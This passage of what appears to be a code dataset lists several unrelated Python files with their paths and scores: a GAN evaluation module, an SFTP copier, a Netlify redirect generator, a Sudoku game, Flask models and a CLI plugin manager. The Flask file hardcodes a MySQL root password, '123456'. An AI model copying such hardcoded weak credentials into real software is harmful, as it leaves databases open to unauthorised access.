out = self.forward_with_divisor(y_expanded, self.divide_expanded_forward_pass,
noise_stds=noise_stds)
out_reshaped = utils.restore_expanded_4d_batch(out, expansion)
if self.test_cfg['fid_and_psnr']:
self.ours_s_fids[i].update(out_reshaped[:self.num_fid_evals])
self.psnr_for_ours_s_fid[i].update(x_expanded, out)
if save_collage:
self.collages[idx].update("fake_z" + str(noise_stds), out_reshaped[:8])
if expansion == 64 and noise_stds == 1:
out_reshaped_64_sigma_1 = out_reshaped
if self.test_cfg['fid_and_psnr']:
for i, ours_a_expansion in enumerate(self.num_avg_samples_traversal):
out = self.forward_with_divisor(utils.expand_4d_batch(y, ours_a_expansion),
self.divide_expanded_forward_pass, noise_stds=1)
out_reshaped_fid = utils.restore_expanded_4d_batch(out, ours_a_expansion)
out_fid_mean = out_reshaped_fid.mean(0)
self.ours_a_fids[i].update(out_fid_mean.unsqueeze(0))
self.psnr_for_ours_a_fid[i].update(x, out_fid_mean)
if save_collage and ours_a_expansion == 64:
out_reshaped_64_sigma_1 = out_reshaped_fid
if save_collage:
if out_reshaped_64_sigma_1 is None:
out = self.forward_with_divisor(utils.expand_4d_batch(y, 64),
self.divide_expanded_forward_pass, noise_stds=1)
out_reshaped_64_sigma_1 = utils.restore_expanded_4d_batch(out, 64)
self.collages[idx].update("mean", out_reshaped_64_sigma_1.mean(0))
self.collages[idx].update("std_dev_z1", out_reshaped_64_sigma_1.std(0) ** (1 / 4))
if self.test_cfg['denoiser_criteria']:
out = self.forward_with_divisor(y, 1, noise_stds=1)
self.denoiser_criteria.update(out - x, y - out, y - x, self.device)
def test_epoch_end(self, outputs):
if self.test_cfg['fid_and_psnr']:
for i, noise_stds in enumerate(self.noise_std_traversal):
ours_s_fid_scores = self.ours_s_fids[i].compute()
self.log("Sigma_z=" + str(noise_stds) + "_FID_mean", torch.mean(ours_s_fid_scores), prog_bar=True,
logger=True)
self.log("Sigma_z=" + str(noise_stds) + "_FID_std", torch.std(ours_s_fid_scores), prog_bar=True,
logger=True)
self.log("Sigma_z=" + str(noise_stds) + "_PSNR", self.psnr_for_ours_s_fid[i].compute(), prog_bar=True,
logger=True)
for i, num_expansions in enumerate(self.num_avg_samples_traversal):
self.log("N=" + str(num_expansions) + "_FID", self.ours_a_fids[i].compute(), prog_bar=True, logger=True)
self.log("N=" + str(num_expansions) + "_PSNR", self.psnr_for_ours_a_fid[i].compute(), prog_bar=True,
logger=True)
if self.test_cfg['collages']:
for idx in self.collages:
zfill = max(self.test_cfg['save_batch'])
self.collages[idx].compute(math.ceil(math.log10(zfill)))
if self.test_cfg['denoiser_criteria']:
save_path = os.path.join(self.test_path, "histograms")
utils.mkdir(save_path)
hist_kwargs = dict(bins='auto', density=True)
label = 'noise-std=1_'
result = self.denoiser_criteria.compute(save_path, label=label, **hist_kwargs)
self.log(label + "local remainder noise worst p-value", result['remainder_noise_worst_p'],
prog_bar=True, logger=True)
self.log(label + "local remainder noise random p-value", result['remainder_noise_random_p'],
prog_bar=True, logger=True)
self.log(label + "remainder noise overall p-value", result['remainder_noise_overall_p'],
prog_bar=True, logger=True) | training_methods/gan.py | import pytorch_lightning as pl
from nets.factory import factory as nets_fac
from optimization.loss_functions import factory as loss_fac
from optimization.optimizers import factory as opt_fac
import numpy as np
from datetime import datetime
import os
import torch
import torchvision.utils as vutils
from pytorch_lightning.metrics import PSNR
import matplotlib.pyplot as plt
import utils.utils as utils
import math
class GAN(pl.LightningModule):
def __init__(self, config):
super().__init__()
self.config = config
self.gen = nets_fac[config['gen_cfg']['type']](config['gen_cfg'])
self.disc = nets_fac[config['disc_cfg']['type']](config['disc_cfg'])
self.gen_loss = loss_fac[config['gen_cfg']['loss_cfg']['type']](config['gen_cfg']['loss_cfg'],
self.gen, self.disc)
self.disc_loss = loss_fac[config['disc_cfg']['loss_cfg']['type']](config['disc_cfg']['loss_cfg'],
self.gen, self.disc)
self.num_disc_steps = config['num_disc_steps']
if 'test_cfg' in config:
self.test_cfg = config['test_cfg']
self.noise_std_traversal = config['test_cfg']['noise_std_traversal']
self.num_avg_samples_traversal = config['test_cfg']['num_avg_samples_traversal']
self.num_fid_evals = config['test_cfg']['num_fid_evals']
self.divide_expanded_forward_pass = config['test_cfg']['divide_expanded_forward_pass']
self.collages = None
self.ours_s_fids = None
self.ours_a_fids = None
self.psnr_for_ours_a_fid = None
self.psnr_for_ours_s_fid = None
self.collage_metric = None
self.val_path = None
self.m_real = None
self.s_real = None
self.test_path = None
self.denoiser_criteria = None
def on_load_checkpoint(self, checkpoint):
sd = self.state_dict()
for param in sd:
if param in checkpoint['state_dict'] and sd[param].size() != checkpoint['state_dict'][param].size():
del checkpoint['state_dict'][param]
def configure_optimizers(self):
gen_opt = opt_fac[self.config['optim_cfg']['type']](self.gen.parameters(), self.config['optim_cfg'])
disc_opt = opt_fac[self.config['optim_cfg']['type']](self.disc.parameters(), self.config['optim_cfg'])
return {'optimizer': gen_opt, 'frequency': 1}, {'optimizer': disc_opt, 'frequency': self.num_disc_steps}
def forward(self, y, **kwargs):
gen_out = self.gen(y=y, encoder_assistance=True, **kwargs)
return gen_out
def batch_postprocess(self, batch):
return batch['real'], batch['noisy']
def training_step(self, batch, batch_idx, optimizer_idx):
x, y = self.batch_postprocess(batch)
if optimizer_idx == 0:
loss, logs = self.gen_loss(real=x, gen_input=y, batch_idx=batch_idx)
self.log_dict(logs, prog_bar=True, logger=True)
else:
loss, logs = self.disc_loss(real=x, gen_input=y)
self.log_dict(logs, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_idx):
if self.collage_metric is None:
self.collage_metric = utils.CollageVal().to(self.device)
x, y = self.batch_postprocess(batch)
y_expanded = utils.expand_4d_batch(y, 4)
with torch.no_grad():
out = self(y=y_expanded, noise_stds=1)
if batch_idx == 0:
self.collage_metric.update(x)
self.collage_metric.update(out)
def validation_epoch_end(self, outputs):
out = self.collage_metric.compute()
self.collage_metric.reset()
fig = plt.figure(figsize=(15, 15))
plt.axis("off")
plt.title("Generated Images")
plt.imshow(np.transpose(vutils.make_grid(out.clamp_(0, 1).detach().cpu(), padding=2,
normalize=False, range=(0, 1)), (1, 2, 0)))
fig.savefig(os.path.join(self.val_path, str(self.current_epoch).zfill(5) + "_fake_collage_" +
datetime.now().strftime("%d-%m-%Y_%I-%M-%S_%p") + ".png"), dpi=350)
def on_test_epoch_start(self):
if self.test_cfg['collages']:
self.collages = torch.nn.ModuleDict(
{str(i): utils.Collage(i, self.test_path, 8,
["real", "noisy"] +
['fake_z' + str(noise_std) for noise_std in self.noise_std_traversal] +
["mean", "std_dev_z1"]).to(self.device) for i in self.test_cfg['save_batch']})
if self.test_cfg['fid_and_psnr']:
self.m_real, self.s_real, model = utils.init_fid(self.test_cfg['training_data_stats_path'],
self.train_dataloader(),
self.device,
verbose=False)
self.ours_a_fids = torch.nn.ModuleList([utils.FID(1, self.m_real, self.s_real, model)
for _ in self.num_avg_samples_traversal]).to(self.device)
self.psnr_for_ours_a_fid = torch.nn.ModuleList([PSNR(1)
for _ in self.num_avg_samples_traversal]).to(self.device)
self.ours_s_fids = torch.nn.ModuleList([utils.FID(self.num_fid_evals, self.m_real, self.s_real, model)
for _ in self.noise_std_traversal]).to(self.device)
self.psnr_for_ours_s_fid = torch.nn.ModuleList([PSNR(1)
for _ in self.noise_std_traversal]).to(self.device)
if self.test_cfg['denoiser_criteria']:
avg_kernel = 1/(3*15*15) * torch.ones(1, 3, 15, 15).to(self.device)
self.denoiser_criteria = utils.DenoiserCriteria(avg_kernel).to(self.device)
def forward_with_divisor(self, y, divisor, **kwargs):
out = []
for i in range(divisor):
out.append(self(y[i * y.shape[0] // divisor: (i + 1) * y.shape[0] // divisor], **kwargs))
return torch.cat(out, dim=0)
def test_step(self, batch, batch_idx):
x, y = self.batch_postprocess(batch)
with torch.no_grad():
save_collage = self.test_cfg['collages'] and batch_idx in self.test_cfg['save_batch']
idx = None
if self.test_cfg['fid_and_psnr'] or save_collage:
if save_collage:
idx = str(batch_idx)
self.collages[idx].set_batch_size(x.shape[0])
self.collages[idx].update("real", x)
self.collages[idx].update("noisy", y)
expansion = max(8, self.num_fid_evals) if save_collage else self.num_fid_evals
y_expanded = utils.expand_4d_batch(y, expansion)
x_expanded = utils.expand_4d_batch(x, expansion)
out_reshaped_64_sigma_1 = None
for i, noise_stds in enumerate(self.noise_std_traversal):
out = self.forward_with_divisor(y_expanded, self.divide_expanded_forward_pass,
noise_stds=noise_stds)
out_reshaped = utils.restore_expanded_4d_batch(out, expansion)
if self.test_cfg['fid_and_psnr']:
self.ours_s_fids[i].update(out_reshaped[:self.num_fid_evals])
self.psnr_for_ours_s_fid[i].update(x_expanded, out)
if save_collage:
self.collages[idx].update("fake_z" + str(noise_stds), out_reshaped[:8])
if expansion == 64 and noise_stds == 1:
out_reshaped_64_sigma_1 = out_reshaped
if self.test_cfg['fid_and_psnr']:
for i, ours_a_expansion in enumerate(self.num_avg_samples_traversal):
out = self.forward_with_divisor(utils.expand_4d_batch(y, ours_a_expansion),
self.divide_expanded_forward_pass, noise_stds=1)
out_reshaped_fid = utils.restore_expanded_4d_batch(out, ours_a_expansion)
out_fid_mean = out_reshaped_fid.mean(0)
self.ours_a_fids[i].update(out_fid_mean.unsqueeze(0))
self.psnr_for_ours_a_fid[i].update(x, out_fid_mean)
if save_collage and ours_a_expansion == 64:
out_reshaped_64_sigma_1 = out_reshaped_fid
if save_collage:
if out_reshaped_64_sigma_1 is None:
out = self.forward_with_divisor(utils.expand_4d_batch(y, 64),
self.divide_expanded_forward_pass, noise_stds=1)
out_reshaped_64_sigma_1 = utils.restore_expanded_4d_batch(out, 64)
self.collages[idx].update("mean", out_reshaped_64_sigma_1.mean(0))
self.collages[idx].update("std_dev_z1", out_reshaped_64_sigma_1.std(0) ** (1 / 4))
if self.test_cfg['denoiser_criteria']:
out = self.forward_with_divisor(y, 1, noise_stds=1)
self.denoiser_criteria.update(out - x, y - out, y - x, self.device)
def test_epoch_end(self, outputs):
if self.test_cfg['fid_and_psnr']:
for i, noise_stds in enumerate(self.noise_std_traversal):
ours_s_fid_scores = self.ours_s_fids[i].compute()
self.log("Sigma_z=" + str(noise_stds) + "_FID_mean", torch.mean(ours_s_fid_scores), prog_bar=True,
logger=True)
self.log("Sigma_z=" + str(noise_stds) + "_FID_std", torch.std(ours_s_fid_scores), prog_bar=True,
logger=True)
self.log("Sigma_z=" + str(noise_stds) + "_PSNR", self.psnr_for_ours_s_fid[i].compute(), prog_bar=True,
logger=True)
for i, num_expansions in enumerate(self.num_avg_samples_traversal):
self.log("N=" + str(num_expansions) + "_FID", self.ours_a_fids[i].compute(), prog_bar=True, logger=True)
self.log("N=" + str(num_expansions) + "_PSNR", self.psnr_for_ours_a_fid[i].compute(), prog_bar=True,
logger=True)
if self.test_cfg['collages']:
for idx in self.collages:
zfill = max(self.test_cfg['save_batch'])
self.collages[idx].compute(math.ceil(math.log10(zfill)))
if self.test_cfg['denoiser_criteria']:
save_path = os.path.join(self.test_path, "histograms")
utils.mkdir(save_path)
hist_kwargs = dict(bins='auto', density=True)
label = 'noise-std=1_'
result = self.denoiser_criteria.compute(save_path, label=label, **hist_kwargs)
self.log(label + "local remainder noise worst p-value", result['remainder_noise_worst_p'],
prog_bar=True, logger=True)
self.log(label + "local remainder noise random p-value", result['remainder_noise_random_p'],
prog_bar=True, logger=True)
self.log(label + "remainder noise overall p-value", result['remainder_noise_overall_p'],
prog_bar=True, logger=True) | 0.83622 | 0.316211 |
import logging
import paramiko
import hashlib
import datetime
import configparser
import sys
import os
conf_file = '/mnt/conf/sftp.conf'
#conf_file = '/home/orenault/Developments/airflow-demo/docker-files/connect-sftp/sftp-local.conf'
def read_conf(confFile):
sftpConf = {}
try:
with open(confFile, 'r') as conf:
config = configparser.ConfigParser()
config.readfp(conf)
for section_name in config.sections():
for name, value in config.items(section_name):
sftpConf[name] = value
print
except IOError:
print ("ERROR: Can't read conf file!")
sys.exit(0)
return sftpConf
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def main():
conf = read_conf(conf_file)
# initialize paramiko client
ssh = paramiko.SSHClient()
ssh.load_host_keys(conf['known_hosts_file'])
with open(conf['dest_path'] + '/sha256', "a+") as f:
# initiate connection
try:
ssh.connect(conf['hostname'], port=conf['port'], username=conf['username'], key_filename=conf['ssh_key'], compress=True, look_for_keys=False)
sftp = ssh.open_sftp()
sftp.chdir(conf['src_path'])
for filename in sftp.listdir():
try:
local_file_size = os.stat(conf['dest_path'] + "/" + filename).st_size
if local_file_size != sftp.stat(filename).st_size:
raise IOError
except IOError:
sftp.get(filename, conf['dest_path'] + "/" + filename)
f.write(filename + " " + sha256_checksum(conf['dest_path'] + '/' + filename) + " " + str(datetime.datetime.now()).split('.')[0] + "\n")
print(filename)
ssh.close()
print('DONE')
except paramiko.SSHException:
print('Connection Error')
if __name__ == "__main__":
main() | docker-files/connect-sftp/copy-files.py |
import logging
import paramiko
import hashlib
import datetime
import configparser
import sys
import os
conf_file = '/mnt/conf/sftp.conf'
#conf_file = '/home/orenault/Developments/airflow-demo/docker-files/connect-sftp/sftp-local.conf'
def read_conf(confFile):
sftpConf = {}
try:
with open(confFile, 'r') as conf:
config = configparser.ConfigParser()
config.readfp(conf)
for section_name in config.sections():
for name, value in config.items(section_name):
sftpConf[name] = value
print
except IOError:
print ("ERROR: Can't read conf file!")
sys.exit(0)
return sftpConf
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def main():
conf = read_conf(conf_file)
# initialize paramiko client
ssh = paramiko.SSHClient()
ssh.load_host_keys(conf['known_hosts_file'])
with open(conf['dest_path'] + '/sha256', "a+") as f:
# initiate connection
try:
ssh.connect(conf['hostname'], port=conf['port'], username=conf['username'], key_filename=conf['ssh_key'], compress=True, look_for_keys=False)
sftp = ssh.open_sftp()
sftp.chdir(conf['src_path'])
for filename in sftp.listdir():
try:
local_file_size = os.stat(conf['dest_path'] + "/" + filename).st_size
if local_file_size != sftp.stat(filename).st_size:
raise IOError
except IOError:
sftp.get(filename, conf['dest_path'] + "/" + filename)
f.write(filename + " " + sha256_checksum(conf['dest_path'] + '/' + filename) + " " + str(datetime.datetime.now()).split('.')[0] + "\n")
print(filename)
ssh.close()
print('DONE')
except paramiko.SSHException:
print('Connection Error')
if __name__ == "__main__":
main() | 0.164886 | 0.051272 |
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
# IMPORTS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import csv
import urllib.request
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
# FUNCTIONS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
def write_index_html(noindex=True, nofollow=True):
"""
Write Index.html file to be dispalyed as main entry point of redirect subdomain.
"""
index = "noindex" if noindex else "index"
follow = "nofollow" if nofollow else "follow"
html_str = f"""
<html>
<head>
<meta name="robots" content="{index},{follow}">
</head>
<body>
Welcome to Google Sheet URL Shortener
</body>
</html>
"""
html_file = open("index.html", "w")
html_file.write(html_str)
html_file.close()
def gsheet_to_netlify_toml(google_sheet_url = None):
"""
Main function to generate netlify.toml file.
This function download Google Sheets as CSV file and fetch the data.
"""
if google_sheet_url:
response = urllib.request.urlopen(google_sheet_url)
lines = [l.decode("utf-8") for l in response.readlines()]
gsheet_data = csv.reader(lines)
rules = []
for data in gsheet_data:
if "https://" in data[0] and len(data) == 3:
rules.append(
[
f"[[redirects]]\n",
f'from = "{data[1].strip()}"\n',
f'to = "{data[0].strip()}"\n',
f'code = {data[2].strip()}\n',
"\n",
]
)
path = "netlify.toml"
with open(path, "w", encoding="utf-8") as f:
f.writelines(["".join(rule) for rule in rules])
if __name__ == "__main__":
google_sheet_url = None # replace if you do not want to specify it via netlify environment variables
if not google_sheet_url:
google_sheet_url = os.environ.get('gsheet_url')
write_index_html(noindex=False, nofollow=False)
gsheet_to_netlify_toml(google_sheet_url) | shortener.py | # +++++++++++++++++++++++++++++++++++++++++++++++++++++
# IMPORTS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import csv
import urllib.request
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
# FUNCTIONS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
def write_index_html(noindex=True, nofollow=True):
"""
Write Index.html file to be dispalyed as main entry point of redirect subdomain.
"""
index = "noindex" if noindex else "index"
follow = "nofollow" if nofollow else "follow"
html_str = f"""
<html>
<head>
<meta name="robots" content="{index},{follow}">
</head>
<body>
Welcome to Google Sheet URL Shortener
</body>
</html>
"""
html_file = open("index.html", "w")
html_file.write(html_str)
html_file.close()
def gsheet_to_netlify_toml(google_sheet_url = None):
"""
Main function to generate netlify.toml file.
This function download Google Sheets as CSV file and fetch the data.
"""
if google_sheet_url:
response = urllib.request.urlopen(google_sheet_url)
lines = [l.decode("utf-8") for l in response.readlines()]
gsheet_data = csv.reader(lines)
rules = []
for data in gsheet_data:
if "https://" in data[0] and len(data) == 3:
rules.append(
[
f"[[redirects]]\n",
f'from = "{data[1].strip()}"\n',
f'to = "{data[0].strip()}"\n',
f'code = {data[2].strip()}\n',
"\n",
]
)
path = "netlify.toml"
with open(path, "w", encoding="utf-8") as f:
f.writelines(["".join(rule) for rule in rules])
if __name__ == "__main__":
google_sheet_url = None # replace if you do not want to specify it via netlify environment variables
if not google_sheet_url:
google_sheet_url = os.environ.get('gsheet_url')
write_index_html(noindex=False, nofollow=False)
gsheet_to_netlify_toml(google_sheet_url) | 0.227727 | 0.118385 |
import pygame
from sudoku import constants as cst
from sudoku.Generators import sudGen
from sudoku.solvers import SudokuSolve
class Tile:
def __init__(self, num=0, isOrig=False):
self.img = "pics/num" + str(num) + ".png"
self.x = 0
self.y = 0
self.val = num
self.isOrig = isOrig
self.Image = pygame.image.load(self.img)
def updatePos(self, row, col):
self.y = cst.GRID_LEFT_OFFSET + row * (cst.TILE_WIDTH + cst.TILE_X_SPACER)
self.x = cst.GRID_TOP_OFFSET + col * (cst.TILE_HEIGHT + cst.TILE_Y_SPACER)
def switch(self, newNum: int):
self.img = "pics/num" + str(newNum) + ".png"
self.val = newNum
self.updateImage()
def updateImage(self):
self.Image = pygame.image.load(self.img)
def display(self):
self.Image = pygame.transform.scale(self.Image, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
tileImage = pygame.image.load("pics/num0.png")
tileImage = pygame.transform.scale(tileImage, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
if self.isOrig:
tileImage.set_alpha(150)
pass
cst.screen.blit(tileImage, (self.x + 2, self.y + 2))
cst.screen.blit(self.Image, (self.x + 2, self.y + 2))
class Board:
def __init__(self):
self.grid = [
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()] ]
self.basicBoard = sudGen.getSudoku()
self.setGrid()
def change(self, loc, newNum):
if(SudokuSolve.valid(self.basicBoard, loc, newNum) or newNum == 0):
self.basicBoard[loc[0]][loc[1]] = newNum
self.grid[loc[0]][loc[1]].switch(newNum)
else:
return False
pass
def setGrid(self):
# nb = sudokuGen2.make()
nb = self.basicBoard
for row in range(len(nb)):
for col in range(len(nb)):
if nb[row][col] != 0: # random.randrange(2, 5) != 4 and
self.grid[row][col] = Tile(nb[row][col], True)
self.grid[row][col].updatePos(row, col)
def display(self):
for tiles in self.grid:
for tile in tiles:
tile.display() | sudoku/classes.py | import pygame
from sudoku import constants as cst
from sudoku.Generators import sudGen
from sudoku.solvers import SudokuSolve
class Tile:
def __init__(self, num=0, isOrig=False):
self.img = "pics/num" + str(num) + ".png"
self.x = 0
self.y = 0
self.val = num
self.isOrig = isOrig
self.Image = pygame.image.load(self.img)
def updatePos(self, row, col):
self.y = cst.GRID_LEFT_OFFSET + row * (cst.TILE_WIDTH + cst.TILE_X_SPACER)
self.x = cst.GRID_TOP_OFFSET + col * (cst.TILE_HEIGHT + cst.TILE_Y_SPACER)
def switch(self, newNum: int):
self.img = "pics/num" + str(newNum) + ".png"
self.val = newNum
self.updateImage()
def updateImage(self):
self.Image = pygame.image.load(self.img)
def display(self):
self.Image = pygame.transform.scale(self.Image, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
tileImage = pygame.image.load("pics/num0.png")
tileImage = pygame.transform.scale(tileImage, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
if self.isOrig:
tileImage.set_alpha(150)
pass
cst.screen.blit(tileImage, (self.x + 2, self.y + 2))
cst.screen.blit(self.Image, (self.x + 2, self.y + 2))
class Board:
def __init__(self):
self.grid = [
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()] ]
self.basicBoard = sudGen.getSudoku()
self.setGrid()
def change(self, loc, newNum):
if(SudokuSolve.valid(self.basicBoard, loc, newNum) or newNum == 0):
self.basicBoard[loc[0]][loc[1]] = newNum
self.grid[loc[0]][loc[1]].switch(newNum)
else:
return False
pass
def setGrid(self):
# nb = sudokuGen2.make()
nb = self.basicBoard
for row in range(len(nb)):
for col in range(len(nb)):
if nb[row][col] != 0: # random.randrange(2, 5) != 4 and
self.grid[row][col] = Tile(nb[row][col], True)
self.grid[row][col].updatePos(row, col)
def display(self):
for tiles in self.grid:
for tile in tiles:
tile.display() | 0.24608 | 0.216446 |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@127.0.0.1:3306/keli'
db = SQLAlchemy(app)
class Device(db.Model):
__tablename__ = 'device'
gprsSn = db.Column(db.String(20), primary_key=True)
company = db.Column(db.String(32), unique=True)
addr = db.Column(db.String(32))
inited = db.Column(db.String(10))
stat = db.Column(db.String(10))
almCode = db.Column(db.String(10))
almAddr = db.Column(db.String(10))
t = db.Column(db.String(50))
ip = db.Column(db.String(50))
location = db.Column(db.String(50))
serviceInfo = db.Column(db.String(300))
province = db.Column(db.String(50))
city = db.Column(db.String(50))
def __repr__(self):
return "<Device %r>" % self.gprsSn
#设备详细信息
def json_details(self):
return {
'gprsSn': self.gprsSn,
'company': self.company if self.company != ""and self.company != None else"宁波柯力创安科技股份有限公司",
'inited': "在线" if self.inited=='1' else"离线",
'stat': "故障" if self.stat != '0' else "正常",
'almCode': self.almCode,
'serviceInfo': self.serviceInfo if self.serviceInfo != "" else "无"
}
class Alarm(db.Model):
__tablename__='alarm'
gprsSn = db.Column(db.String(20), primary_key=True)
almNum = db.Column(db.String(50), unique=True)
def __repr__(self):
return "<Alarm %r>" % self.gprsSn
class Alarmrecord(db.Model):
__tablename__ = 'alarmrecord'
id = db.Column(db.Integer, primary_key=True)
gprsSn = db.Column(db.String(20))
recordTime = db.Column(db.DateTime(0))
code = db.Column(db.String(10))
addr = db.Column(db.String(10))
deviceType = db.Column(db.String(20))
stat = db.Column(db.String(10))
def __repr__(self):
return "<AlarmRecord %r>" % self.gprsSn
# 故障信息
def json_alarm(self):
return {
'recordTime': self.recordTime,
'code': self.code,
'addr': self.addr,
'stat': self.stat
} | kelidata.py | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@127.0.0.1:3306/keli'
db = SQLAlchemy(app)
class Device(db.Model):
__tablename__ = 'device'
gprsSn = db.Column(db.String(20), primary_key=True)
company = db.Column(db.String(32), unique=True)
addr = db.Column(db.String(32))
inited = db.Column(db.String(10))
stat = db.Column(db.String(10))
almCode = db.Column(db.String(10))
almAddr = db.Column(db.String(10))
t = db.Column(db.String(50))
ip = db.Column(db.String(50))
location = db.Column(db.String(50))
serviceInfo = db.Column(db.String(300))
province = db.Column(db.String(50))
city = db.Column(db.String(50))
def __repr__(self):
return "<Device %r>" % self.gprsSn
#设备详细信息
def json_details(self):
return {
'gprsSn': self.gprsSn,
'company': self.company if self.company != ""and self.company != None else"宁波柯力创安科技股份有限公司",
'inited': "在线" if self.inited=='1' else"离线",
'stat': "故障" if self.stat != '0' else "正常",
'almCode': self.almCode,
'serviceInfo': self.serviceInfo if self.serviceInfo != "" else "无"
}
class Alarm(db.Model):
__tablename__='alarm'
gprsSn = db.Column(db.String(20), primary_key=True)
almNum = db.Column(db.String(50), unique=True)
def __repr__(self):
return "<Alarm %r>" % self.gprsSn
class Alarmrecord(db.Model):
__tablename__ = 'alarmrecord'
id = db.Column(db.Integer, primary_key=True)
gprsSn = db.Column(db.String(20))
recordTime = db.Column(db.DateTime(0))
code = db.Column(db.String(10))
addr = db.Column(db.String(10))
deviceType = db.Column(db.String(20))
stat = db.Column(db.String(10))
def __repr__(self):
return "<AlarmRecord %r>" % self.gprsSn
# 故障信息
def json_alarm(self):
return {
'recordTime': self.recordTime,
'code': self.code,
'addr': self.addr,
'stat': self.stat
} | 0.318697 | 0.050051 |
from instmakelib import instmake_log as LOG
from instmakelib import shellsyntax
from instmakelib import clibase
import sys
class CLIManager:
"""Manages the CLI plugins."""
def __init__(self, plugins=None):
# Load CLI plugins
if not plugins:
plugins = LOG.GetPlugins()
mods = plugins.LoadAllPlugins(LOG.CLI_PLUGIN_PREFIX)
# Containers for CLI plugins to register themselves to.
self.tool_contains = []
self.tool_regexes = []
# Key = 'name' from plugin, Value = plugin module
self.plugin_names = {}
for mod in mods:
mod.register(self)
self.plugin_names[mod.name] = mod
def PrintHelp(self):
names = self.plugin_names.keys()
names.sort()
for name in names:
mod = self.plugin_names[name]
print name, ":", mod.description
mod.usage()
def UserOption(self, user_option):
i = user_option.find(",")
if i < 1:
sys.exit("Invalid CLI plugin option: %s" % (user_option,))
plugin_name = user_option[:i]
option_text = user_option[i+1:]
options = option_text.split(",")
if not self.plugin_names.has_key(plugin_name):
sys.exit("No CLI plugin '%s'" % (plugin_name,))
mod = self.plugin_names[plugin_name]
for option in options:
mod.UserOption(option)
def _ParseCmdline(self, cmdline_string):
cmdline_args = shellsyntax.split_shell_cmdline(cmdline_string)
# XXX - We need to be able to handle "segmented" command-lines
# (using &&, ||, ;, and the redirection symbols). But we don't
# have a full-blown shell-cmdline parser. For now, we can help
# the cli plugins if we tidy things up a bit.
if cmdline_args:
# Remove any prefixed new-lines, which can come in from
# make-3.81
cmdline_args = [a.lstrip("\n") for a in cmdline_args]
# Look for a word that stars with `, like `gcc..... ...`
for i, arg in enumerate(cmdline_args):
if len(arg) > 1 and arg[0] == "`":
cmdline_args = cmdline_args[:i]
if ";" in cmdline_args:
i = cmdline_args.index(";")
cmdline_args = cmdline_args[:i]
if "||" in cmdline_args:
i = cmdline_args.index("||")
cmdline_args = cmdline_args[:i]
if "&&" in cmdline_args:
i = cmdline_args.index("&&")
cmdline_args = cmdline_args[:i]
# Trailing semicolon attached to a word
if cmdline_args[-1] == ";":
cmdline_args = cmdline_args[:-1]
# make-3.81 will put a trailing backslash ("\\n") in the cmdline,
# which shows up as \n; after the previous filter, it will now
# be an empty string, so remove that here.
cmdline_args = filter(lambda x: x != "", cmdline_args)
return cmdline_args
def ParseRecord(self, rec, cwd=None, pathfunc=None):
"""Find a Parser object that can parse the command-line in the
log record."""
cmdline_args = self._ParseCmdline(rec.cmdline)
# Check tool regexes
for (regex, cb) in self.tool_regexes:
if rec.tool != None and regex.search(rec.tool):
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Check tool substrings
for (substring, cb) in self.tool_contains:
if rec.tool != None and rec.tool.find(substring) > -1:
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Nothing matched. Return None for "no parser"
return None
# Methods a CLI plugin can call to register itself.
